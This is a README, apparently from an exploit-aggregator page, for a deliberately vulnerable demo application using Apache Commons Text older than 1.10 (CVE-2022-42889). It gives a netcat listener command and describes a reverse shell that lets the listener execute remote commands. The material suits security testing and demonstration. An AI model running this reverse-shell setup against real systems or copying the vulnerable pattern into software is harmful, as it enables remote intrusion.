Share 
## https://sploitus.com/exploit?id=02581350-72A7-51B5-AAEF-7A49545171B7
# CVE-2022-42889 Test application

This repository contains a simple application using Apache Commons Text < 1.10 which is vulnerable to CVE-2022-42889.

## Running the application

Replace `DemoApplication.java` nc command by your host ip address. 


Listening with netcat:

```sh
$ nc -l -p 30000
```

Build and run docker vulnerable code

```bash
docker build . -t vulnerable-app
docker run vulnerable-app
```

As you can see netcat will be able to execute remote commands